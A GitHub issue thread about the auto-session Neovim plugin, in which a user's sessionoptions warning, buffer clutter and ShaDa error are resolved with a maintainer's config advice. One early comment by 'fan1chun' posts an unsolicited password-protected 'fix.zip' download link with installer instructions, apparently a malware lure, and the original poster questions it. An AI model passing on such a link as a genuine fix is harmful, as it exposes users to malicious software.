### ISSUE TITLE
[BUG] vim.o.sessionoptions is missing localoptions

### ISSUE THREAD

**Issue by nnako** [rmagatti/auto-session#369]
**the bug**

after a recent update of the `auto-session` plugin, when starting neovim, I get a warning message:
```
auto-sessopm WARN: vim.o.sessionoptions is missing localoptions.
Use ':checkhealth autosession' for more info.
2 buffers wiped out
```
the effect I see while working with `auto-session` looks like this:
- my command history does not get updated with new commands. so, when typing `:cd example\path` in order to prepare for changing projects, this command does not seem to be stored for later retrieval e.g. by using the `<UP>` arrow key. after a new start of neovim, I get the same history items as I got before I did the update of plugins.
- after loading a project by cd-ing into the respective folder via `:cd project\path` and then restoring the session via `:SessionRestore`, I see loads of buffers (hundreds of them) when issuing the `:buffers` command. Even though after restoring a project I see the message "xxx buffers wiped out", there are still hundreds of buffers stored within the list. buffers from any kind of unrelated context.
- when quitting neovim by pressing the `<X>` button on the terminal window, I see a red message on the bottom of the screen, saying `E138: All C:\Users\<user>\AppData\Local\nvim-data\shada\main.shada.tmp.X files exist, cannot write ShaDa file!`

Maybe the problem doesn't stem from `auto-session` but I wouldn't know where to start looking for help.

**To Reproduce**
Don't know how to reproduce on another system. As this seems to be a problem on my local computer. Maybe it is just a misguided write-protection on one of the background files?

**Expected behavior**
I would expect that neovim starts up in a clean way and that the history of commands gets stored and retrieved, accordingly.

**Checkhealth**
Paste the contents of `checkhealth auto-session` here

the suggested "help" (seen in the introductory message) does not show anything valuable, as the plugin name seems to be misspelled `autosession` instead of `auto-session`. When spelling right, I see:

```
auto-session: require("auto-session.health").check()

vim options ~
- WARNING `vim.o.sessionoptions` should contain 'localoptions' to make sure
  filetype and highlighting work correctly after a session is restored.
  
  Recommended setting is:
  vim.o.sessionoptions="blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions"
  
Lazy.nvim settings ~
- Lazy.nvim not loaded

Config ~
- You have old config names. You could update your config to:
  {
    log_level = "warning"
  }
  
  You could also need to remove any vim global config settings

General Info ~
- Session directory: C:\Users\<user>\AppData\Local\nvim-data\sessions\
- Current session: C:\Users\<user>
- Current session file: C:\Users\<user>\AppData\Local\nvim-data\sessions\C%3A%5CUsers%5C<user>.vim
```

It is interesting that my config shows correct "names":

```lua
  --
  -- session management
  --

  -- use "natecraddock/sessions.nvim" -- a bunch of snippets to use
  use {
    'rmagatti/auto-session',
    config = function()
      require("auto-session").setup {
        log_level = "warning",
        -- log_level = "debug",
      }
    end

    -- further configurations see sessions.lua

  }
```

and I wouldn't know WHERE to put the recommended setting for `vim.o.sessionoptions` in order to be executed at the appropriate time.

**Baseline (please complete the following information):**
- Result of `set sessionoptions?`:
```
sessionoptions=blank,buffers,curdir,folds,help,tabpages,winsize,terminal
```
- OS. e.g `uname -a`:
```
windows 10
```
- Neovim version `nvim --version`
```
v0.11.0-dev-267+g20a7eebec
```

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nnako** [comment]
why should I?

**Comment by cameronr** [comment]
Ok, there are a few things going on in this report, let me try to break it down.

1. `vim.o.sessionoptions`: you can set `vim.o.sessionoptions` anywere in your nvim config. if you don't have anywhere else to put it, you can update your `auto-session` config to:

```lua
use {
    'rmagatti/auto-session',
    config = function()
      vim.o.sessionoptions="blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions"
      require("auto-session").setup {
        log_level = "warning",
        -- log_level = "debug",
      }
    end
  }
```

2. Old config names: there was a bug that was saying you had only config names when you didn't. Please make sure you have the latest version via `Lazy update`. Let me know if you're still getting this error after updating to the latest version.

3. Buffers: how did that session get created? It must have been saved with buffers you were not expecting. You can close those buffers and resave the session with `:SessionSave`. After doing that, are the buffers as you expect? Also, if you want auto-session to automatically save/restore sessions when cd'ing, you can set `cwd_change_handling = true,` in your config

4. ShaDa error: I have seen ShaDa errors on windows before but I don't know what causes them. Clearing your shada directory should fix it:

https://github.com/neovim/neovim/issues/8587#issuecomment-1656643933

Or maybe you just need to clear the shada tmp files:

https://github.com/neovim/neovim/issues/8587#issuecomment-2176399196

hope that helps!

**Comment by nnako** [comment]
Hi @cameronr , thanks a lot for your suggestions!

applying your suggestions solved all the problems mentioned, except for the warning message concerning the sessionoperions within the config file:

```lua
use {
    'rmagatti/auto-session',
    config = function()
      vim.o.sessionoptions="blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions"
      require("auto-session").setup {
        log_level = "warning",
        -- log_level = "debug",
      }
    end
  }
```

Starting up vim, I still shows the message that `localoptions` are missing.

I have to admit, though, that I don't know how to "Lazy update" the plugin. My plugin configuration automatically pulls all installed plugins from their GitHub repo, as soon as I save the plugin config file. There I saw the latest commits (done by you). So, I assume, I am using the latest version of `auto-session`.

**Comment by cameronr** [comment]
Hmm, it is strange that you're still getting the warning about `localoptions`.

First, sorry about the `Lazy update` reference, I forgot you're not using Lazy.nvim. Sounds like `auto-session` is already up to date so you can ignore the lazy stuff.

The check for `localoptions` happens inside the `auto-session.setup` function so i'm quite confused why you'd still be getting that warning.

Couple of questions:

1. You're getting the warning when you first start `nvim`, right?
2. Does `checkhealth auto-session` also show that `localoptions` is missing or does it say it's ok?
3. Is it possible `auto-session` is being `require`d somewhere else in your config before the block you pasted?
4. Can set `log_level = 'debug',` in your config and post the logs? You should be able to see the logs either via `messages` or `Notifications` depending on if you have `nvim-notify` or not.

**Comment by nnako** [comment]
Hi @cameronr , thanks again for your thoughts. I took a screencast to show what is happening concerning your questions (1), (2) and (4):

https://github.com/user-attachments/assets/e5c40d36-7377-4842-b2cc-66e301b17422

Concerning your question (3), I use the following structure:

my `init.lua` first calls **`plugins.lua`** where all plugins are started.

```lua
return packer.startup(function(use)

...

  --
  -- session management
  --

  -- use "natecraddock/sessions.nvim" -- a bunch of snippets to use
  use {
    'rmagatti/auto-session',
    config = function()
      vim.o.sessionoptions="blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions"
      require("auto-session").setup {
        -- log_level = "warning",
        log_level = "debug",
      }
    end

    -- further configurations see sessions.lua

  }

...
```

this is where "require" is called for the first time and the `vim.o.sessionoptions` are set.

Next in `init.lua` is the "require" for the **`sessions.lua`** file which is to set further configurations for auto-session:

```lua
--
-- customize session management
--

-- check if plugin is present
local status_ok, session_mgt = pcall(require, "auto-session")
if not status_ok then
    return
end

-- set options
local opts = {
    log_level = 'info',
    auto_session_enable_last_session = false,
    auto_session_root_dir = vim.fn.stdpath('data').."/sessions/",
    auto_session_enabled = true,
    auto_save_enabled = true,
    auto_restore_enabled = true,
    cwd_change_handling = nil,
    -- cwd_change_handling = {
       -- restore_upcoming_session = true, -- already the default, no need to specify like this, only here as an example
       -- pre_cwd_changed_hook = nil, -- already the default, no need to specify like this, only here as an example
    --    post_cwd_changed_hook = function() -- example refreshing the lualine status line _after_ the cwd changes
    --        require("lualine").refresh() -- refresh lualine so the new session name is displayed in the status bar
    --    end,
    --    },

    -- configure suppressed folders
    auto_session_suppress_dirs = {
        "~/",
        "~/Projects",
        "~/Downloads",
        "/"
    },

    auto_session_use_git_branch = nil,
    bypass_session_save_file_types = nil
}

-- setup plugin
session_mgt.setup(opts)
```

Here, the `log_level` is set again (and might have overridden the first set of "warning" or "debug" from `plugins.lua`. Would it be possible that another call to "require" will set previous configurations back to defaults before overriding them with the ones present within the "require"?

Thanks for helping out. I still lack a lot of basic understanding of how to know how to do things within neovim and as well the integration of lua language.

**Comment by nnako** [comment]
an addition: after changing the `log_level` to "debug" within the file `session.lua`, the debug messages got verbose, indeed:

![image](https://github.com/user-attachments/assets/893bf52c-c4e3-4d1d-8aca-b1537f77f060)

**Comment by nnako** [comment]
Now, I tried to move the

```lua
vim.o.sessionoptions="blank,buffers,curdir,folds,help,tabpages,winsize,winpos,terminal,localoptions"
```

over from `plugins.lua` to `sessions.lua` (before the definition of `opts`) and the warning message about a missing `localoptions`has vanished :-) .

So, my guess is, any "require" will first reset the respective plugin configurations back to default before overriding with the things the user wants to be configured.

**Comment by cameronr** [comment]
Lua caches require calls so just requiring a module doesn't reinitialize it (the second call gives you back the singleton created from the first call). I'm not very familiar with `packer` but here's what i think is happening:

1. the use block where `auto-session` is required the first time isn't actually calling the config function so it's not setting the session options. This could be because you have to run `:PackerCompile` every time you make a change to your config so it's not seeing any changes you make there until you compile it (but that's just a guess)
2. You then set the config options in `sessions.lua`. But you really shouldn't have to have a separate file for setting config options (nor should you need to use `pcall` just to set config options) , all of that should be done in the same block where you specify the plugin.

For what it's worth, I think you might be making it harder on yourself that you need to. I was recently new to nvim and found the https://github.com/dam9000/kickstart-modular.nvim project a fantastic way to get introduced to the ecosystem. As an example, this is all that's needed for my `auto-session` config:

https://github.com/cameronr/dotfiles/blob/main/nvim/lua/custom/plugins/auto-session.lua

**Comment by nnako** [comment]
Thanks a lot for the hint about "kickstart-modular". Now, I activated my own fork and added your config for auto-session. After setting our bestfriend `localoptions` as a parameter to `vim.opt.sessionoptions` within the file `lua / options.lua`, it works. With loads of functionalities which I will have to understand. Hope, it is a better and modular approach that reduces the "fiddling around", in the end.

**Comment by cameronr** [comment]
Glad it's working for you! One small tweak, you can delete the `log_level = 'debug',` line from your `auto-session` config. I keep it on since I'm often working on new features but you don't need it if everything is working for you.

**Comment by cameronr** [comment]
For posterity, this is what I think was actually happening with the packer config.

1. `sessions.lua` is processed first (maybe packer processes `use` calls later?), calling setup with old config values. if `sessionoptions` wasn't set by then, it shows the `localoptions` pop up.
2. Later, the table in `use` is processed and the `config` function is called which calls setup again, this time with only `log_debug`, overwriting the previous config (but not clearing the flag that indicates old config values)
